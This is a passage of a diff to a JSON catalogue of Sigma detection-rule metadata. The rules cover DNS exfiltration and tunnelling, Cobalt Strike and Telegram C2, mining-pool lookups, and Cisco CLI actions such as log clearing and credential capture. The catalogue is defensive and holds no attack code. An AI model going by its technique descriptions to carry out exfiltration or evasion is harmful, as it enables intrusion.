"falsepositive": [ - "Unknown" - ], - "filename": "net_dns_external_service_interaction_domains.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/breakersall/status/1533493587828260866", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.reconnaissance", - "attack.t1595.002" - ] - }, - "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", - "value": "DNS Query to External Service Interaction Domains" - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_bytes_out.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", - "value": "High DNS Bytes Out" - }, - { - "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_null_records_requests_rate.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", - "value": "High NULL Records Requests Rate" - }, - { - "description": "High DNS requests amount from host per short period of time", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS requests rate to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_requests_rate.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", - "value": "High DNS Requests Rate" - }, - { - "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_txt_records_requests_rate.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", - "value": "High TXT Records Requests Rate" - }, - { - "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/05/10", - "falsepositive": [ - "Unknown" - ], - "filename": "net_dns_mal_cobaltstrike.yml", - "level": "critical", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", - "value": "Cobalt Strike DNS Beaconing" - }, - { - "description": "Detects suspicious DNS queries to Monero mining pools", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/24", - "falsepositive": [ - "Legitimate crypto coin mining" - ], - "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496", - "attack.t1567" - ] - }, - "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", - "value": "Monero Crypto Coin Mining Pool Lookup" - }, - { - "description": "Detects suspicious DNS queries using base64 encoding", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/05/10", - "falsepositive": [ - "Unknown" - ], - "filename": "net_dns_susp_b64_queries.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/krmaxwell/dns-exfiltration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", - "value": "Suspicious DNS Query with B64 Encoded String" - }, - { - "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/06/05", - "falsepositive": [ - "Legitimate use of Telegram bots in the company" - ], - "filename": "net_dns_susp_telegram_api.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://core.telegram.org/bots/faq", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102.002" - ] - }, - "uuid": "c64c5175-5189-431b-a55e-6d9882158251", - "value": "Telegram Bot API Request" - }, - { - "description": "Detects strings used in command execution in DNS TXT Answer", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/08/08", - "falsepositive": [ - "Unknown" - ], - "filename": "net_dns_susp_txt_exec_strings.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/stvemillertime/status/1024707932447854592", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", - "value": "DNS TXT Answer with Possible Execution Strings" - }, - { - "description": "Detects wannacry killswitch domain dns queries", - "meta": { - "author": "Mike Wade", - "creation_date": "2020/09/16", - "falsepositive": [ - "Analyst testing" - ], - "filename": "net_dns_wannacry_killswitch_domain.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", - "value": "Wannacry Killswitch Domain" - }, - { - "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "net_firewall_apt_equationgroup_c2.yml", - "level": "high", - "logsource.category": "firewall", - "logsource.product": "No established product", - "refs": [ - "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", - "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.g0020", - "attack.t1041" - ] - }, - "uuid": "881834a4-6659-4773-821e-1c151789d873", - "value": "Equation Group C2 Communication" - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" - ], - "filename": "net_firewall_high_dns_bytes_out.yml", - "level": "medium", - "logsource.category": "firewall", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "3b6e327d-8649-4102-993f-d25786481589", - "value": "High DNS Bytes Out - Firewall" + "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", + "value": "Network Scans Count By Destination Port" }, { "description": "High DNS requests amount from host per short period of time", @@ -10310,55 +83,915 @@ "value": "Network Scans Count By Destination IP" }, { - "description": "Detects many failed connection attempts to different ports or hosts", + "description": "High DNS queries bytes amount from host per short period of time", "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/02/19", + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", "falsepositive": [ - "Inventarization systems", - "Vulnerability scans" + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" ], - "filename": "net_firewall_susp_network_scan_by_port.yml", + "filename": "net_firewall_high_dns_bytes_out.yml", "level": "medium", "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "3b6e327d-8649-4102-993f-d25786481589", + "value": "High DNS Bytes Out - Firewall" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "net_firewall_cleartext_protocols.yml", + "level": "low", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", + "value": "Cleartext Protocol Usage" + }, + { + "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "net_firewall_apt_equationgroup_c2.yml", + "level": "high", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.g0020", + "attack.t1041" + ] + }, + "uuid": "881834a4-6659-4773-821e-1c151789d873", + "value": "Equation Group C2 Communication" + }, + { + "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": "net_dns_susp_telegram_api.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://core.telegram.org/bots/faq", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102.002" + ] + }, + "uuid": "c64c5175-5189-431b-a55e-6d9882158251", + "value": "Telegram Bot API Request" + }, + { + "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", + "meta": { + "author": "Florian Roth, Matt Kelly (list of domains)", + "creation_date": "2022/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_external_service_interaction_domains.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/breakersall/status/1533493587828260866", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.reconnaissance", + "attack.t1595.002" + ] + }, + "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", + "value": "DNS Query to External Service Interaction Domains" + }, + { + "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", + "value": "Cobalt Strike DNS Beaconing" + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_bytes_out.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", + "value": "High DNS Bytes Out" + }, + { + "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_null_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", + "value": "High NULL Records Requests Rate" + }, + { + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/07", + "falsepositive": [ + "Valid software, which uses dns for transferring data" + ], + "filename": "net_dns_c2_detection.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004", + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "value": "Possible DNS Tunneling" + }, + { + "description": "Detects strings used in command execution in DNS TXT Answer", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/08", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_txt_exec_strings.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", + "value": "DNS TXT Answer with Possible Execution Strings" + }, + { + "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_txt_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", + "value": "High TXT Records Requests Rate" + }, + { + "description": "Detects suspicious DNS queries using base64 encoding", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_b64_queries.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/krmaxwell/dns-exfiltration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", + "value": "Suspicious DNS Query with B64 Encoded String" + }, + { + "description": "High DNS requests amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", + "value": "High DNS Requests Rate" + }, + { + "description": "Detects wannacry killswitch domain dns queries", + "meta": { + "author": "Mike Wade", + "creation_date": "2020/09/16", + "falsepositive": [ + "Analyst testing" + ], + "filename": "net_dns_wannacry_killswitch_domain.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", + "value": "Wannacry Killswitch Domain" + }, + { + "description": "Detects suspicious DNS queries to Monero mining pools", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/24", + "falsepositive": [ + "Legitimate crypto coin mining" + ], + "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496", + "attack.t1567" + ] + }, + "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", + "value": "Monero Crypto Coin Mining Pool Lookup" + }, + { + "description": "Find information about network devices that is not stored in config files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Commonly used by administrators for troubleshooting" + ], + "filename": "cisco_cli_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" ], "tags": [ "attack.discovery", - "attack.t1046" + "attack.t1083", + "attack.t1201", + "attack.t1057", + "attack.t1018", + "attack.t1082", + "attack.t1016", + "attack.t1049", + "attack.t1033", + "attack.t1124" ] }, - "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", - "value": "Network Scans Count By Destination Port" + "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", + "value": "Cisco Discovery" }, { - "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "description": "Modifications to a config that will serve an adversary's impacts or persistence", "meta": { - "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", - "creation_date": "2020/05/03", + "author": "Austin Clark", + "creation_date": "2019/08/12", "falsepositive": [ - "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate administrators may run these commands" ], - "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "filename": "cisco_cli_modify_config.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.impact", + "attack.t1490", + "attack.t1505", + "attack.t1565.002", + "attack.t1053" + ] + }, + "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", + "value": "Cisco Modify Configuration" + }, + { + "description": "See what files are being deleted from flash file systems", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Will be used sometimes by admins to clean up local flash space" + ], + "filename": "cisco_cli_file_deletion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070.004", + "attack.t1561.001", + "attack.t1561.002" + ] + }, + "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", + "value": "Cisco File Deletion" + }, + { + "description": "Various protocols maybe used to put data on the device for exfil or infil", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Generally used to copy configs or IOS images" + ], + "filename": "cisco_cli_moving_data.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" + ], + "tags": [ + "attack.collection", + "attack.lateral_movement", + "attack.command_and_control", + "attack.exfiltration", + "attack.t1074", + "attack.t1105", + "attack.t1560.001" + ] + }, + "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", + "value": "Cisco Stage Data" + }, + { + "description": "See what commands are being input into the device by other people, full credentials can be in the history", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Not commonly run by administrators, especially if remote logging is configured" + ], + "filename": "cisco_cli_input_capture.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", + "value": "Cisco Show Commands Input" + }, + { + "description": "Collect pertinent data from the configuration files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Commonly run by administrators" + ], + "filename": "cisco_cli_collect_data.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.collection", + "attack.t1087.001", + "attack.t1552.001", + "attack.t1005" + ] + }, + "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", + "value": "Cisco Collect Data" + }, + { + "description": "Turn off logging locally or remote", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "cisco_cli_disable_logging.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", + "value": "Cisco Disabling Logging" + }, + { + "description": "Detect a system being shutdown or put into different boot mode", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/15", + "falsepositive": [ + "Legitimate administrators may run these commands, though rarely." + ], + "filename": "cisco_cli_dos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" + ], + "tags": [ + "attack.impact", + "attack.t1495", + "attack.t1529", + "attack.t1565.001" + ] + }, + "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", + "value": "Cisco Denial of Service" + }, + { + "description": "Show when a monitor or a span/rspan is setup or modified", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Admins may setup new or modify old spans, or use a monitor for troubleshooting" + ], + "filename": "cisco_cli_net_sniff.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", + "value": "Cisco Sniffing" + }, + { + "description": "Find local accounts being created or modified as well as remote authentication configurations", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "When remote authentication is in place, this should not change often" + ], + "filename": "cisco_cli_local_accounts.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1098" + ] + }, + "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", + "value": "Cisco Local Accounts" + }, + { + "description": "Show when private keys are being exported from the device, or when new certificates are installed", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Not commonly run by administrators. Also whitelist your known good certificates" + ], + "filename": "cisco_cli_crypto_actions.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1553.004", + "attack.t1552.004" + ] + }, + "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", + "value": "Cisco Crypto Commands" + }, + { + "description": "Clear command history in network OS which is used for defense evasion", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "filename": "cisco_cli_clear_logs.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", + "value": "Cisco Clear Logs" + }, + { + "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/06/23", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_default_cobalt_strike_certificate.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + 